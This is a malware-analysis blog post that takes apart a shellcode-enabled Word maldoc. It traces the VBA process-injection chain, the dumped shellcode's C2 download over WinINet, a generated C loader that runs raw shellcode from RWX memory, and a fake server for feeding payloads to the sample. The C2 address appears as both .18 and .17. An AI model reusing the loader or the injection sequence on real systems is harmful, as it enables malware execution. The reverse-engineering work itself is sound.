Maldocs and shellcode
By Filip Olszak
This is a continuation of the Maldocs payload extraction post, with a deeper dive into one particular shellcode-enabled document.
In the previous post we looked into a few quick wins for dynamic payload extraction from Office maldocs, using the Office VBA editor, x64dbg and AMSI. These techniques, together with static code review, should be sufficient for most samples, but some exceptions make the analysis more demanding. One such exception is shellcode.
We can find malicious documents leveraging shellcode using the below VirusTotal query:
type:doc p:10+ code injection
In my search, "50.doc" stood out the most, with 33 vendors flagging it as malicious. The document contains several VBA modules, and in one of them we quickly find what appears to be a shellcode array.
Keeping in mind that it may or may not be stored in an XOR’ed / encrypted form, any attempt at conversion and extraction through VBA scripting would have to be done after the decryption routines have run. Instead, we are going to take a shortcut and use x64dbg with Process Hacker later on to grab the instructions directly from the target memory segment.
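For readers who do want to try the scripted route, here is a minimal Python sketch of the conversion step: turning a VBA-style array of signed integers into raw bytes and optionally undoing a single-byte XOR. The function name, the sample values and the XOR scheme are assumptions made for illustration; nothing here is taken from 50.doc.

```python
def vba_array_to_bytes(values, xor_key=None):
    """Convert VBA-style integers (possibly negative) into raw bytes.

    xor_key is optional and models a single-byte XOR, which is only an
    assumption about how a sample might obfuscate its array.
    """
    out = bytearray()
    for v in values:
        b = v & 0xFF              # map negative VBA values into 0..255
        if xor_key is not None:
            b ^= xor_key          # undo the (assumed) single-byte XOR
        out.append(b)
    return bytes(out)
```

For example, vba_array_to_bytes([-4, -24]).hex() gives fce8, because -4 and -24 wrap around to 0xfc and 0xe8.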
Another thing we notice is that the sample declares four WinAPI functions that it is going to use to accomplish the injection.
Each function receives a VBA function alias which will be used later in the code to perform the associated API call.
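When the modules are exported as text, the alias-to-API mapping can be pulled out automatically. The following is a rough sketch that assumes the usual VBA Declare syntax; the regular expression and the function name find_api_aliases are mine, and the sample line in the note below is illustrative rather than copied from the document.

```python
import re

# Matches: Declare [PtrSafe] Function|Sub <Name> Lib "<dll>" [Alias "<api>"]
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+'
    r'Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)


def find_api_aliases(vba_source):
    """Return {vba_name: (library, real_api_name)} for each Declare found."""
    aliases = {}
    for name, lib, alias in DECLARE_RE.findall(vba_source):
        # Without an Alias clause the VBA name is the API name itself.
        aliases[name] = (lib, alias or name)
    return aliases
```

Fed a line such as Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (...), it maps RunStuff to ("kernel32", "CreateProcessA").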
The first call, to RunStuff (CreateProcessA), takes the variable sProc as the command line of the new process. The contents of sProc are heavily obfuscated, but placing a breakpoint on the next instruction and running the module allows us to read the clear-text command line, which differs depending on the system architecture.
This is going to be the process where a new PAGE_EXECUTE_READWRITE memory segment will be allocated, as indicated by the 0x40 memory protection constant passed to the allocation call.
Next, a For loop iterates through the discovered array of bytes, passing them one by one to the memory-writing call.
CreateRemoteThread is then used to initiate execution of the shellcode.
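To double-check constants like 0x40 while reading the macro, a small lookup helps. This sketch covers only the basic Windows memory protection values and ignores modifier flags such as PAGE_GUARD; the helper name describe_protection is an assumption of mine.

```python
# Basic Windows memory protection constants (low byte of flProtect).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}


def describe_protection(value):
    """Name the base protection, dropping modifier bits above the low byte."""
    base = value & 0xFF
    return PAGE_PROTECTION.get(base, "unknown (0x%x)" % base)
```

describe_protection(0x40) returns PAGE_EXECUTE_READWRITE, matching what the macro requests.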
We now have enough intel to set a breakpoint on calls to kernel32_WriteProcessMemory, in order to identify the newly allocated memory segment where the shellcode is about to get populated.
After reaching the call and consulting the Microsoft documentation, we know that the RDX register holds lpBaseAddress, a pointer to the beginning of our shellcode memory page.
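The register lookup follows from the Windows x64 calling convention, where the first four integer arguments travel in RCX, RDX, R8 and R9 and the rest go on the stack. As a small sketch (the helper name is mine, and the stack offsets assume the breakpoint is hit on the first instruction of the function, right after the return address was pushed):

```python
X64_ARG_REGISTERS = ["RCX", "RDX", "R8", "R9"]

# Parameter order of WriteProcessMemory as documented by Microsoft.
WRITE_PROCESS_MEMORY_PARAMS = [
    "hProcess", "lpBaseAddress", "lpBuffer", "nSize", "lpNumberOfBytesWritten",
]


def map_args_to_locations(params):
    """Map parameter names to where a debugger shows them at function entry."""
    locations = {}
    for index, name in enumerate(params):
        if index < len(X64_ARG_REGISTERS):
            locations[name] = X64_ARG_REGISTERS[index]
        else:
            # 8 bytes of return address plus one 8-byte slot per argument,
            # the first four slots being the caller's shadow space.
            locations[name] = "[RSP+0x%X]" % (8 + index * 8)
    return locations
```

For WriteProcessMemory this puts lpBaseAddress in RDX and the buffer being written in R8.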
We can also confirm that WINWORD.EXE has already spawned rundll32.exe in a suspended state.
Browsing through the memory pages of that process, the page at 0x2e80000 clearly sticks out with its Private: Commit allocation type and RWX protection.
Looking at the memory contents of that region, it already contains the first byte of our shellcode.
At this point we have successfully identified the memory space where the shellcode will be written.
We can now disable the breakpoint on kernel32_WriteProcessMemory and add a new breakpoint on kernel32_CreateRemoteThread. Execution can then be resumed to let the malware copy over the rest of the shellcode.
We can already see some interesting strings in the raw contents:
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Process Hacker allows us to save the identified memory segment, which we can further reverse and debug.
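Once the segment is saved to disk, a quick pass for printable strings is a cheap first triage step. Below is a minimal sketch of a strings-style extractor; the function name and the default minimum length are my own choices, and it only looks for ASCII, not UTF-16.

```python
import re


def extract_strings(data, min_len=6):
    """Return runs of printable ASCII of at least min_len characters."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]
```

Run against the dumped bytes (for example the result of open(path, "rb").read()), this should surface items like the User-Agent header shown above.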
Looking up the IP address on VT confirms that it is indeed known for receiving comms from several maldocs, including our 50.doc.
Shellcode is usually a piece of position-independent code, expected to accomplish its tasks regardless of where in memory it resides. To make debugging easier, we want to wrap this machine code in some sort of shellcode harness: converting it into a PE greatly increases the number of tools we can use.
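The post does not depend on any particular conversion tool. One possible approach, sketched here as an assumption rather than the method actually used, is to generate a tiny C loader that embeds the dumped bytes, copies them into executable memory and jumps to them. The helper name make_c_harness is hypothetical, and the emitted C has to be compiled on Windows for the same architecture as the shellcode.

```python
def make_c_harness(shellcode):
    """Return C source for a minimal loader embedding the given bytes."""
    body = ", ".join("0x%02x" % b for b in shellcode)
    return (
        "#include <windows.h>\n"
        "#include <string.h>\n\n"
        "static const unsigned char sc[] = { %s };\n\n"
        "int main(void) {\n"
        "    /* RWX buffer, mirroring what the maldoc allocates remotely */\n"
        "    void *mem = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,\n"
        "                             PAGE_EXECUTE_READWRITE);\n"
        "    if (mem == NULL) return 1;\n"
        "    memcpy(mem, sc, sizeof(sc));\n"
        "    ((void (*)(void))mem)();   /* transfer control to the shellcode */\n"
        "    return 0;\n"
        "}\n"
    ) % body
```

Writing the returned string to a .c file and building it yields an executable whose entry path leads straight into the shellcode, which is convenient for setting the first breakpoint.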
After we have the executable ready, we can drop it into x64dbg.
At the very beginning of the code we notice multiple instructions that are typical of position-independent malware referencing structures stored at known relative offsets: first the Thread Information Block (TIB) structure (via the FS/GS segment register) to get the address of the Process Environment Block (PEB) at offset +0x30, and later other structures needed for things like dynamically loading libraries.
0x00c _PEB_LDR_DATA* Ldr;
0x014 void* SubSystemData;
0x028 DWORD EnvironmentUpdateCount;
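The offsets in this listing can be reproduced by modelling the start of the 32-bit PEB. This is a sketch limited to the leading fields whose layout I am confident about; pointers are declared as 32-bit integers so the offsets come out the same regardless of the machine running the script, and the class name PEB32 is my own.

```python
import ctypes


class PEB32(ctypes.Structure):
    """Leading fields of the 32-bit PEB (pointers modelled as uint32)."""
    _fields_ = [
        ("InheritedAddressSpace", ctypes.c_uint8),
        ("ReadImageFileExecOptions", ctypes.c_uint8),
        ("BeingDebugged", ctypes.c_uint8),
        ("Spare", ctypes.c_uint8),
        ("Mutant", ctypes.c_uint32),
        ("ImageBaseAddress", ctypes.c_uint32),
        ("Ldr", ctypes.c_uint32),                # _PEB_LDR_DATA*
        ("ProcessParameters", ctypes.c_uint32),
        ("SubSystemData", ctypes.c_uint32),
    ]


def field_offsets(struct):
    """Return {field_name: offset} for a ctypes structure class."""
    return {name: getattr(struct, name).offset for name, _ in struct._fields_}
```

field_offsets(PEB32) places Ldr at 0x0c and SubSystemData at 0x14, in line with the listing. In 32-bit code the PEB pointer itself is read from FS:[0x30], and following Ldr leads to the loaded module lists that shellcode walks to find library base addresses.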
We then go through decryption routines that load our strings, such as the file system path to the process image and the names of WinAPI and libc functions.
Finally we see it loading wininet by jumping to the LoadLibraryA address held in a register.
Later on the same loader function is used to initialize the use of wininet.InternetOpenA and open an HTTP comms channel with our C2 over remote port 8888 (0x22B8).
HINTERNET hInternet == 4, //wininet instance handle
LPCSTR lpszServerName == 10.1.198.18,
INTERNET_PORT nServerPort == 22B8,
DWORD dwService == 3,
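The debugger shows these arguments as raw hex, so a tiny decoder makes them easier to read. This sketch converts the port and names the service type using the WinINet INTERNET_SERVICE_* constants; the function name decode_connect_args is an assumption.

```python
# WinINet service type constants.
INTERNET_SERVICES = {
    1: "INTERNET_SERVICE_FTP",
    2: "INTERNET_SERVICE_GOPHER",
    3: "INTERNET_SERVICE_HTTP",
}


def decode_connect_args(port_hex, service):
    """Return (decimal port, service name) from debugger-style values."""
    return int(port_hex, 16), INTERNET_SERVICES.get(service, "unknown")
```

decode_connect_args("22B8", 3) returns (8888, "INTERNET_SERVICE_HTTP"), so the shellcode speaks plain HTTP to port 8888.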
From a call to wininet.HttpOpenRequestA we learn that it requests the /OOmQ path, and a call to wininet.HttpSendRequestA uses the User-Agent string found earlier.
HINTERNET hConnect == 8,
LPCSTR lpszObjectName == "/OOmQ",
HINTERNET hRequest == 00CC000C,
LPCSTR lpszHeaders == "User-Agent: Mozilla/5.0 ...",
DWORD dwHeadersLength == FFFFFFFF,
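The dwHeadersLength value of FFFFFFFF is easier to interpret as a signed number. A short sketch of the conversion follows (the helper name is mine):

```python
def to_signed32(value):
    """Interpret a 32-bit value shown by the debugger as a signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value
```

to_signed32(0xFFFFFFFF) is -1. According to the WinINet documentation for HttpSendRequest, a headers length of -1 tells the function to treat lpszHeaders as a zero-terminated string and compute the length itself.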
If the request to hxxp://10.1.198.17:8888/OOmQ times out, the process exits.
We are not going to attempt analysis of that file, but if we wanted to further investigate what the shellcode is doing with it, we can serve our own PE file on this address, and see how it’s processed by the shellcode.
To do this we can use Fiddler AutoResponder conditional rules and a random EXE.
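If Fiddler is not at hand, a rough alternative is a small HTTP server that answers every GET with the same file. This is a sketch of that swapped-in approach, not what was used in this post: the names make_handler and serve and the sample.exe path mentioned below are hypothetical, and it assumes the analysis VM is configured so that traffic to the C2 address and port 8888 reaches this listener.

```python
import http.server


def make_handler(payload):
    """Build a handler class that returns payload for any GET path."""
    class FixedPayloadHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)

        def log_message(self, fmt, *args):
            # Print the request line details and the client's User-Agent.
            print("request:", self.command, self.path,
                  self.headers.get("User-Agent"))

    return FixedPayloadHandler


def serve(path, port=8888):
    """Serve the file at path to every GET request until interrupted."""
    with open(path, "rb") as fh:
        payload = fh.read()
    http.server.HTTPServer(("0.0.0.0", port), make_handler(payload)).serve_forever()
```

Calling serve("sample.exe") from an isolated lab machine answers the /OOmQ request with the stand-in file and logs the User-Agent the shellcode sends.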
The file is requested and returned to the shellcode process.
VirtualAlloc allocates a new memory region with RWX protection. The same region then receives the downloaded remote file.
And all is clear